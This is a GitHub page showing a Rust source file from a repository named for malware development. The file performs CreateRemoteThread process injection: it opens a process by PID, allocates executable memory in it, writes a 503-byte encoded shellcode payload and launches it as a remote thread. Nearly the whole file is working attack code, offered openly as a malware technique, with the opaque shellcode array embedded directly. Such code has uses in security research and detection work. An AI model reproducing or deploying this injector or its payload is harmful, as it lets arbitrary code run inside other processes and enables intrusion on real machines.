forked from Whitecat18/Rust-for-Malware-Development
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathinject_on_remoteprocess.rs
114 lines (100 loc) · 4.66 KB
/
inject_on_remoteprocess.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
/*
CreateRemoteThread Shellcode Injection : Exec Shellcode in Remote Process
For more codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
@5mukx
*/
use std::ptr::null_mut;
use winapi::{shared::minwindef::LPVOID, um::{errhandlingapi::GetLastError, handleapi::CloseHandle, memoryapi::{VirtualAllocEx, WriteProcessMemory}, processthreadsapi::{CreateRemoteThread, OpenProcess}, winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}}};
macro_rules! okey{
($msg:expr, $($arg:expr), *) => {
println!("\\____[+] {}", format!($msg, $($arg),*));
}
}
macro_rules! error{
($msg:expr, $($arg:expr), *) => {
println!("\\____[-] {}", format!($msg, $($arg), *));
println!("Exiting ...");
std::process::exit(0);
}
}
fn main(){
let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
0x90,0x2a,0x5b,0x02,0xfe,0x59,0xda,0xcc,0x48,0x31,0x58,0x27,
0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x6c,0x62,0xd8,0xe6,
0x0e,0xb1,0x1a,0xcc,0x90,0x2a,0x1a,0x53,0xbf,0x09,0x88,0x9d,
0xc6,0x62,0x6a,0xd0,0x9b,0x11,0x51,0x9e,0xf0,0x62,0xd0,0x50,
0xe6,0x11,0x51,0x9e,0xb0,0x62,0xd0,0x70,0xae,0x11,0xd5,0x7b,
0xda,0x60,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x16,0x3a,0x7e,
0xfc,0x75,0xfa,0x8d,0x51,0xe3,0x56,0x43,0xff,0x98,0x38,0x21,
0xc2,0x6b,0x0a,0x4a,0x75,0x0b,0xfa,0x47,0xd2,0x16,0x13,0x03,
0x2e,0xd2,0x5a,0x44,0x90,0x2a,0x5b,0x4a,0x7b,0x99,0xae,0xab,
0xd8,0x2b,0x8b,0x52,0x75,0x11,0xc2,0x88,0x1b,0x6a,0x7b,0x4b,
0xff,0x89,0x39,0x9a,0xd8,0xd5,0x92,0x43,0x75,0x6d,0x52,0x84,
0x91,0xfc,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x6b,0x9a,0xcb,
0xf3,0x18,0xdb,0x0d,0xa8,0xca,0x2e,0xf3,0xb2,0x5a,0x96,0xe8,
0x98,0x6f,0x62,0xd3,0x8b,0x81,0x82,0x88,0x1b,0x6a,0x7f,0x4b,
0xff,0x89,0xbc,0x8d,0x1b,0x26,0x13,0x46,0x75,0x19,0xc6,0x85,
0x91,0xfa,0x1a,0x89,0xfa,0xd1,0x92,0xcd,0x40,0x6b,0x03,0x43,
0xa6,0x07,0x83,0x96,0xd1,0x72,0x1a,0x5b,0xbf,0x03,0x92,0x4f,
0x7c,0x0a,0x1a,0x50,0x01,0xb9,0x82,0x8d,0xc9,0x70,0x13,0x89,
0xec,0xb0,0x8d,0x33,0x6f,0xd5,0x06,0x4b,0x40,0x2e,0xa9,0xfe,
0xcf,0x19,0x69,0x02,0xfe,0x18,0x8c,0x85,0x19,0xcc,0x13,0x83,
0x12,0xf9,0xdb,0xcc,0x90,0x63,0xd2,0xe7,0xb7,0xe5,0xd8,0xcc,
0x91,0x91,0x9b,0xaa,0x98,0x43,0x9b,0x98,0xd9,0xa3,0xbf,0x4e,
0x77,0xa8,0x9b,0x76,0xdc,0x5d,0x7d,0x05,0x01,0x8c,0x96,0x45,
0x7a,0x42,0x5a,0x03,0xfe,0x59,0x83,0x8d,0x2a,0x03,0xdb,0x69,
0xfe,0xa6,0x0f,0x9c,0xc0,0x67,0x6a,0xcb,0xb3,0x68,0x1a,0x84,
0x6f,0xea,0x13,0x8b,0x3c,0x11,0x25,0x0c,0xd8,0xa3,0x9a,0x43,
0x44,0xb3,0xd5,0x13,0x70,0xd5,0x8e,0x4a,0x77,0x9e,0xb0,0xdc,
0xd1,0x72,0x17,0x8b,0x1c,0x11,0x53,0x35,0xd1,0x90,0xc2,0xa7,
0x8a,0x38,0x25,0x19,0xd8,0xab,0x9f,0x42,0xfc,0x59,0xda,0x85,
0x28,0x49,0x36,0x66,0xfe,0x59,0xda,0xcc,0x90,0x6b,0x0b,0x43,
0xae,0x11,0x53,0x2e,0xc7,0x7d,0x0c,0x4f,0xcf,0x99,0xb0,0xc1,
0xc9,0x6b,0x0b,0xe0,0x02,0x3f,0x1d,0x88,0xb4,0x7e,0x5a,0x03,
0xb6,0xd4,0x9e,0xe8,0x88,0xec,0x5b,0x6a,0xb6,0xd0,0x3c,0x9a,
0xc0,0x6b,0x0b,0x43,0xae,0x18,0x8a,0x85,0x6f,0xea,0x1a,0x52,
0xb7,0xa6,0x12,0x81,0x19,0xeb,0x17,0x8b,0x3f,0x18,0x60,0xb5,
0x5c,0x15,0xdd,0xfd,0x2b,0x11,0xeb,0x1e,0xd8,0xd5,0x91,0x89,
0xf0,0x18,0x60,0xc4,0x17,0x37,0x3b,0xfd,0x2b,0xe2,0x2a,0x79,
0x32,0x7c,0x1a,0xb8,0x58,0xcc,0x67,0x51,0x6f,0xff,0x13,0x81,
0x3a,0x71,0xe6,0xca,0xec,0x20,0xdb,0xf9,0x1e,0x2c,0xdf,0x77,
0xd7,0x39,0x29,0x6d,0x94,0x59,0x83,0x8d,0x19,0xf0,0xa4,0xd7,
0xfe,0x59,0xda,0xcc];
unsafe{
let pid = std::env::args().nth(1).expect("Please provide the process ID as argument").parse::<u32>().expect("Invalid process ID");
let process_handle = OpenProcess(0x000F0000 | 0x00100000 | 0xFFFF, 0, pid);
if process_handle.is_null(){
error!("OpenProcess Error : {:?}",GetLastError());
}
okey!("OpenProcess: {:?}",process_handle);
let remote_buffer = VirtualAllocEx(
process_handle,
null_mut(),
buf.len(),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE,
);
if remote_buffer.is_null(){
error!("VirtualAlloc Error {:?}",GetLastError());
}
okey!("VirtualAlloc {:?}",remote_buffer);
WriteProcessMemory(
process_handle,
remote_buffer,
buf.as_ptr() as LPVOID,
buf.len(),
null_mut(),
);
let _remote_thread = CreateRemoteThread(
process_handle,
null_mut(),
0,
std::mem::transmute(remote_buffer),
null_mut(),
0,
null_mut(),
);
CloseHandle(process_handle);
}
}